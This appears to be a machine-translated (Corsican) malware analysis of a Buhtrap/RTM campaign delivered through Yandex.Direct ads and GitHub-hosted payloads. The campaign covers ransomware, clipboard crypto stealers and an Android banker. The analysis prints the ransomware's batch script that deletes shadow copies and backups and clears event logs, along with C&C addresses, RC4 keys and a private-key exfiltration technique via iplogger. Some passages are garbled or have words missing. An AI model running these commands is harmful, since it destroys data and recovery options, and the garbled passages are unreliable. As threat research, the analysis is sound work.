Per target accountants in un ciberattaccu, pudete aduprà documenti di travagliu chì cercanu in linea. Questu hè apprussimatamente ciò chì un gruppu ciberneticu hà fattu in l'ultimi mesi, distribuzendu backdoors cunnisciuti. и , è ancu di criptu è software per arrubà e criptovalute. A maiò parte di i miri sò situati in Russia. L'attaccu hè statu fattu mettendu publicità maliciosa in Yandex.Direct. I vittimi potenziali sò stati diretti à un situ web induve sò stati dumandati à scaricà un schedariu maliziusu disguised cum'è un mudellu di documentu. Yandex hà eliminatu a publicità maliziosa dopu u nostru avvisu.
U codice fonte di Buhtrap hè statu filtratu in linea in u passatu per chì qualcunu pò usà. Ùn avemu micca infurmazione nantu à a dispunibilità di u codice RTM.
In questu post vi diceremu cumu l'attaccanti distribuiscenu malware cù Yandex.Direct è l'ospitu in GitHub. U post cuncluderà cù una analisi tecnica di u malware.
Buhtrap è RTM sò tornati in l'affari
Meccanismu di diffusione è vittimi
I vari carichi pagati consegnati à e vittime sparte un mecanismu di propagazione cumuni. Tutti i fugliali maliziusi creati da l'attaccanti sò stati posti in dui repositori GitHub differenti.
Di genere, u repositoriu cuntene un schedariu maliziusu scaricabile, chì cambiava spessu. Siccomu GitHub permette di vede a storia di cambiamenti in un repository, pudemu vede quale malware hè statu distribuitu durante un certu periodu. Per cunvince a vittima per scaricà u schedariu maliziusu, u situ web blanki-shabloni24[.]ru, mostratu in a figura sopra, hè stata utilizata.
U disignu di u situ è tutti i nomi di i fugliali maliziusi seguitanu un cuncettu unicu - forme, mudelli, cuntratti, campioni, etc. In cunsiderà chì u software Buhtrap è RTM sò digià utilizatu in attacchi à accountants in u passatu, avemu presumitu chì u strategia in a nova campagna hè a stessa. L'unica quistione hè cumu a vittima ghjunse à u situ di l'attaccanti.
Infezzione
Almenu parechji vittimi putenziali chì anu finitu in stu situ sò stati attratti da publicità maliziosa. Quì sottu hè un esempiu URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Comu pudete vede da u ligame, u banner hè statu publicatu nantu à u foru di cuntabilità legittima bb.f2[.]kz. Hè impurtante à nutà chì i banners apparsu in siti diffirenti, tutti avianu u listessu id di campagna (blanki_rsya), è a maiò parte di i servizii di cuntabilità o assistenza legale. L'URL mostra chì a vittima potenziale hà utilizatu a dumanda "scaricate a forma di fattura", chì sustene a nostra ipotesi di attacchi mirati. Quì sottu sò i siti induve i banners apparsu è e dumande di ricerca currispundenti.
- Scaricate a forma di fattura - bb.f2[.]kz
- cuntrattu di mostra - Ipopen[.]ru
- mostra di lagnanza di l'applicazione - 77metrov[.]ru
- forma di accordu - blank-dogovor-kupli-prodazhi[.]ru
- mostra di petizioni di tribunale - zen.yandex[.]ru
- reclamu di mostra - yurday[.]ru
- Forme di cuntrattu di mostra - Regforum[.]ru
- forma di cuntrattu - assistentus[.]ru
- Esempiu di accordu di l'appartamentu - napravah[.]com
- campioni di cuntratti legali - avito[.]ru
U situ Blanki-shabloni24[.]ru pò esse cunfiguratu per passà una valutazione visuale simplice. Di genere, un annunziu chì punta à un situ d'aspettu prufessiunale cù un ligame à GitHub ùn pare micca qualcosa ovviamente male. Inoltre, l'attaccanti anu caricatu fugliali maliziusi à u repositoriu solu per un periudu limitatu, prubabilmente durante a campagna. A maiò parte di u tempu, u repository GitHub cuntene un archiviu zip vacu o un schedariu EXE in biancu. Cusì, l'attaccanti puderanu distribuisce publicità attraversu Yandex.Direct nantu à i siti chì eranu più prubabilmente visitati da accountanti chì sò venuti in risposta à e dumande di ricerca specifiche.
In seguitu, fighjemu i diversi carichi distribuiti in questu modu.
Analisi di carichi utili
Cronologia di a distribuzione
A campagna maliziosa principia à a fini di uttrovi 2018 è hè attiva à u mumentu di a scrittura. Siccomu tuttu u repositoriu era dispunibule publicamente in GitHub, avemu cumpilatu una cronologia precisa di a distribuzione di sei famiglie di malware diverse (vede a figura sottu). Avemu aghjustatu una linea chì mostra quandu u ligame di u banner hè statu scupertu, cum'è misurata da a telemetria ESET, per paragunà cù a storia di git. Comu pudete vede, questu hè correlate bè cù a dispunibilità di u payload in GitHub. A discrepanza à a fine di ferraghju pò esse spiegata da u fattu chì ùn avemu micca avutu una parte di a storia di u cambiamentu perchè u repository hè statu sguassatu da GitHub prima di pudè ottene in tuttu.
Figura 1. Cronologia di a distribuzione di malware.
Certificati di firma di codice
A campagna hà utilizatu parechji certificati. Certi sò stati firmati da più di una famiglia di malware, chì indica ancu chì diversi campioni appartenenu à a listessa campagna. Malgradu a dispunibilità di a chjave privata, l'operatori ùn anu micca firmatu sistematicamente i binari è ùn anu micca utilizatu a chjave per tutti i campioni. À a fini di ferraghju 2019, l'attaccanti cuminciaru à creà firme invalide cù un certificatu di Google per quale ùn anu micca a chjave privata.
Tutti i certificati implicati in a campagna è e famiglie di malware chì firmanu sò listati in a tabella sottu.
Avemu ancu utilizatu sti certificati di firma di codice per stabilisce ligami cù altre famiglie di malware. Per a maiò parte di i certificati, ùn avemu micca truvatu mostre chì ùn sò micca distribuite attraversu un repository GitHub. Tuttavia, u certificatu TOV "MARIYA" hè stata utilizata per firmà malware chì appartene à a botnet , adware è minatori. Hè improbabile chì stu malware hè ligatu à sta campagna. Hè assai prubabile, u certificatu hè statu acquistatu nantu à u darknet.
Win32/Filecoder.Buhtrap
U primu cumpunente chì hà pigliatu a nostra attenzione era u novu Win32 / Filecoder.Buhtrap scupertu. Questu hè un schedariu binariu Delphi chì hè qualchì volta imballatu. Hè statu distribuitu principalmente in ferraghju-marzu 2019. Si cumporta cum'è cunvene à un prugramma di ransomware - cerca unità lucali è cartulare di rete è cripta i fugliali rilevati. Ùn hè micca bisognu di una cunnessione Internet per esse cumprumessi perchè ùn cuntattate micca u servitore per mandà chjavi di criptografia. Invece, aghjunghje un "token" à a fine di u missaghju di riscattu, è suggerisce l'usu di email o Bitmessage per cuntattà l'operatori.
Per criptà quant'è più risorse sensittivi pussibule, Filecoder.Buhtrap eseguisce un filu cuncepitu per chjude u software chjave chì pò avè un gestore di schedari aperti chì cuntene infurmazione preziosa chì puderia interferiscenu cù a criptografia. I prucessi di destinazione sò principalmente sistemi di gestione di basa di dati (DBMS). Inoltre, Filecoder.Buhtrap sguassate i schedarii di logu è e copie di salvezza per fà difficultà a ricuperazione di dati. Per fà questu, eseguite u script batch sottu.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap usa un serviziu IP Logger in linea legittimu cuncepitu per cullà infurmazioni nantu à i visitori di u situ web. Questu hè destinatu à seguità e vittime di u ransomware, chì hè a rispunsabilità di a linea di cummanda:
mshta.exe "javascript:document.write('');"
I schedarii per a criptografia sò selezziunati s'ellu ùn currispondenu micca à trè listi di esclusione. Prima, i schedari cù e seguenti estensioni ùn sò micca criptati: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys è .bat. Siconda, tutti i schedarii per i quali u percorsu sanu cuntene strings di repertoriu da a lista sottu sò esclusi.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Terzu, certi nomi di schedari sò ancu esclusi da a criptografia, trà elli u nome di u schedariu di u missaghju di riscattu. A lista hè presentata quì sottu. Ovviamente, tutte queste eccezzioni sò destinate à mantene a macchina in funziunamentu, ma cù una strada minima.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Schema di criptografia di file
Una volta eseguitu, u malware genera una coppia di chjave RSA 512-bit. L'esponente privatu (d) è u modulu (n) sò allora criptati cù una chjave publica 2048-bit codificata (esponente publicu è modulu), zlib-packed, è codificata in base64. U codice rispunsevuli di questu hè mostratu in Figura 2.
Figura 2. Risultu di a decompilazione Hex-Rays di u prucessu di generazione di coppia di chjave RSA 512-bit.
Quì sottu hè un esempiu di testu chjaru cù una chjave privata generata, chì hè un token attaccatu à u missaghju di riscattu.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
A chjave publica di l'attaccanti hè datu quì sottu.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
I schedari sò criptati cù AES-128-CBC cù una chjave 256-bit. Per ogni schedariu criptatu, una nova chjave è un novu vettore di inizializazione sò generati. L'infurmazione chjave hè aghjuntu à a fine di u schedariu criptatu. Fighjemu u furmatu di u schedariu criptatu.
I fugliali criptati anu l'intestazione seguente:
I dati di u schedariu fonte cù l'aghjunzione di u valore magicu VEGA sò criptati à i primi 0x5000 bytes. Tutte l'infurmazioni di decryption sò attaccati à un schedariu cù a struttura seguente:
- U marcatore di dimensione di u schedariu cuntene una marca chì indica se u schedariu hè più grande di 0x5000 bytes
- AES key blob = ZlibCompress (RSAEncrypt (chjave AES + IV, chjave publica di a coppia di chjave RSA generata))
- RSA key blob = ZlibCompress (RSAEncrypt (chjave privata RSA generata, chjave publica RSA codificata))
Win32/ClipBanker
Win32/ClipBanker hè un cumpunente chì hè statu distribuitu intermittenti da a fini d'ottobre à principiu di dicembre 2018. U so rolu hè di monitorà u cuntenutu di u clipboard, cerca l'indirizzi di i portafogli di criptocurrency. Dopu avè determinatu l'indirizzu di a billetera di destinazione, ClipBanker u rimpiazza cù un indirizzu chì crede appartene à l'operatori. I campioni chì avemu esaminatu ùn eranu nè scatuli nè offuscati. L'unicu mecanismu utilizatu per maschera u cumpurtamentu hè a criptografia di stringa. L'indirizzi di a billetera di l'operatore sò criptati cù RC4. I cripto muniti di destinazione sò Bitcoin, Bitcoin cash, Dogecoin, Ethereum è Ripple.
Duranti u periodu chì u malware si sparghje à i portafogli di Bitcoin di l'attaccanti, una piccula quantità hè stata mandata à VTS, chì mette in dubbitu u successu di a campagna. Inoltre, ùn ci hè micca evidenza per suggerisce chì queste transazzioni eranu ligati à ClipBanker.
Win32/RTM
U cumpunente Win32 / RTM hè statu distribuitu per parechji ghjorni à principiu di marzu 2019. RTM hè un bancheru trojanu scrittu in Delphi, destinatu à i sistemi bancari remoti. In 2017, i circadori ESET anu publicatu di stu prugramma, a descrizzione hè sempre pertinente. In ghjennaghju 2019, Palo Alto Networks hà ancu liberatu .
Buhtrap Loader
Per qualchì tempu, un scaricatore era dispunibule nantu à GitHub chì ùn era micca simili à l'arnesi Buhtrap precedenti. Si volta à https://94.100.18[.]67/RSS.php?<some_id> pè ottene u prossimu stadiu è carica direttamente in memoria. Pudemu distingue dui cumpurtamenti di u codice di a seconda tappa. In u primu URL, RSS.php hà passatu u backdoor Buhtrap direttamente - questu backdoor hè assai simili à quellu chì hè dispunibule dopu chì u codice fonte hè stata filtrata.
Curiosamente, vedemu parechje campagni cù u backdoor Buhtrap, è sò presuntamente gestiti da diversi operatori. In questu casu, a diferenza principale hè chì u backdoor hè carricu direttamente in memoria è ùn usa micca u schema abituale cù u prucessu di implementazione DLL chì avemu parlatu. . Inoltre, l'operatori anu cambiatu a chjave RC4 utilizata per criptà u trafficu di a rete à u servitore C&C. In a maiò parte di e campagni chì avemu vistu, l'operatori ùn anu micca preoccupatu di cambià sta chjave.
U secondu cumportamentu più cumplessu era chì l'URL RSS.php hè stata passata à un altru caricatore. Hà implementatu qualchì obfuscazione, cum'è a ricustruzzione di a tavola d'importazione dinamica. U scopu di u bootloader hè di cuntattà u servitore C&C [.]com/api/F27F84EDA4D13B15/2, mandate i logs è aspettate una risposta. Prucessa a risposta cum'è un blob, a carica in memoria è eseguisce. A carica chì avemu vistu eseguisce stu caricatore era u listessu backdoor Buhtrap, ma pò esse altri cumpunenti.
Android/Spy.Banker
Curiosamente, un cumpunente per Android hè statu ancu truvatu in u repository GitHub. Era in u ramu principale per solu un ghjornu - 1 di nuvembre 2018. A parte di esse publicata in GitHub, a telemetria ESET ùn trova nisuna evidenza di distribuzione di stu malware.
U cumpunente hè stata ospitata cum'è un Pacchettu di Applicazioni Android (APK). Hè assai oscuratu. U cumpurtamentu maliziusu hè oculatu in un JAR cifratu situatu in l'APK. Hè criptatu cù RC4 utilizendu sta chjave:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
A listessa chjave è l'algoritmu sò usati per criptà e stringhe. JAR si trova in APK_ROOT + image/files. I primi 4 bytes di u schedariu cuntenenu a durata di u JAR cifratu, chì principia immediatamente dopu à u campu di lunghezza.
Dopu avè decriptatu u schedariu, avemu scupertu chì era Anubis - prima banker per Android. U malware hà e seguenti caratteristiche:
- registrazione di microfonu
- piglià screenshots
- ottene coordenate GPS
- keylogger
- criptografia di dati di u dispositivu è dumanda di riscattu
- mandendu spam
Curiosamente, u bancu hà utilizatu Twitter cum'è un canale di cumunicazione di salvezza per ottene un altru servitore C&C. A mostra chì avemu analizatu hà utilizatu u contu @JonesTrader, ma à u mumentu di l'analisi era digià bluccatu.
U banchieru cuntene una lista di applicazioni di destinazione in u dispositivu Android. Hè più longu di a lista ottenuta in u studiu Sophos. A lista include parechje applicazioni bancarie, prugrammi di shopping online cum'è Amazon è eBay, è servizii di criptocurrency.
MSIL/ClipBanker.IH
L'ultimu cumpunente distribuitu cum'è parte di sta campagna era l'eseguibile .NET Windows, apparsu in marzu 2019. A maiò parte di e versioni studiati sò stati imballati cù ConfuserEx v1.0.0. Cum'è ClipBanker, stu cumpunente usa u clipboard. U so scopu hè una larga gamma di cripto muniti, è ancu offerte nantu à Steam. Inoltre, usa u serviziu IP Logger per arrubà a chjave WIF privata di Bitcoin.
Meccanismi di prutezzione
In più di i benefici chì ConfuserEx furnisce in prevenzione di debugging, dumping è tampering, u cumpunente include a capacità di detectà prudutti antivirus è macchine virtuali.
Per verificà chì funziona in una macchina virtuale, u malware usa a linea di cummanda WMI integrata di Windows (WMIC) per dumandà l'infurmazioni di u BIOS, vale à dì:
wmic bios
Allora u prugramma analizeghja l'output di cumandamentu è cerca parole chjave: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Per detectà i prudutti antivirus, u malware manda una dumanda di Strumentazione di Gestione Windows (WMI) à u Centru di Sicurezza di Windows utilizendu ManagementObjectSearcher API cum'è mostratu quì sottu. Dopu a decodificazione da a basa 64, a chjama si vede cusì:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Prucessu per identificà i prudutti antivirus.
Inoltre, u malware verifica se , un strumentu per pruteggiri contr'à l'attacchi di u clipboard è, s'ellu funziona, suspende tutti i fili in quellu prucessu, disattivendu cusì a prutezzione.
Persistenza
A versione di malware chì avemu studiatu si copia %APPDATA%googleupdater.exe è stabilisce l'attributu "hidden" per u cartulare di Google. Allora cambia u valore SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in u registru di Windows è aghjunghje a strada updater.exe. In questu modu, u malware serà eseguitu ogni volta chì l'utilizatore accede.
Cumportamentu malicioso
Cum'è ClipBanker, u malware monitoreghja u cuntenutu di u clipboard è cerca l'indirizzi di a billetera di criptocurrency, è quandu si trovanu, u rimpiazza cù unu di l'indirizzi di l'operatore. A sottu hè una lista di l'indirizzi di destinazione basatu nantu à ciò chì si trova in u codice.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Per ogni tipu d'indirizzu ci hè una espressione regulare currispundente. U valore STEAM_URL hè utilizatu per attaccà u sistema Steam, cum'è pò esse vistu da l'espressione regulare chì hè utilizata per definisce in u buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Canale di esfiltrazione
In più di rimpiazzà l'indirizzi in u buffer, u malware mira à i chjavi WIF privati di Bitcoin, Bitcoin Core è Electrum Bitcoin wallets. U prugramma usa plogger.org cum'è un canale di esfiltrazione per ottene a chjave privata WIF. Per fà questu, l'operatori aghjunghjenu dati di chjave privata à l'intestazione HTTP User-Agent, cum'è mostra quì sottu.
Figura 4. Consola IP Logger cù dati di output.
L'operatori ùn anu micca utilizatu iplogger.org per esfiltrate wallets. Probabilmente anu ricursu à un metudu sfarente per via di u limitu di caratteri 255 in u campu User-Agentvisualizzatu in l'interfaccia web IP Logger. In i campioni chì avemu studiatu, l'altru servitore di output hè statu guardatu in a variabile ambientale DiscordWebHook. Sorprendentemente, sta variabile di l'ambiente ùn hè micca assignatu in ogni locu in u codice. Questu suggerisce chì u malware hè sempre in sviluppu è a variàbile hè assignata à a macchina di teste di l'operatore.
Ci hè un altru signu chì u prugramma hè in sviluppu. U schedariu binariu include dui URL iplogger.org, è i dui sò interrugati quandu i dati sò esfiltrati. In una dumanda à unu di sti URL, u valore in u campu Referer hè precedutu da "DEV /". Avemu trovu ancu una versione chì ùn era micca imballata cù ConfuserEx, u destinatariu per questu URL hè chjamatu DevFeedbackUrl. Basatu nantu à u nome variabile di l'ambienti, credemu chì l'operatori sò prughjetti di utilizà u serviziu legittimu Discord è u so sistema d'intercepzioni web per arrubbari portafogli di criptu di munita.
cunchiusioni
Questa campagna hè un esempiu di l'usu di i servizii di publicità legittimi in attacchi cibernetici. U schema hè destinatu à l'urganisazioni russe, ma ùn sariamu micca surprisatu di vede un tali attaccu cù servizii non russi. Per evitari di cumprumissu, l'utilizatori devenu esse cunfidenti in a reputazione di a fonte di u software chì scaricanu.
Una lista completa di indicatori di cumprumissu è attributi MITRE ATT&CK hè dispunibule à .
Source: www.habr.com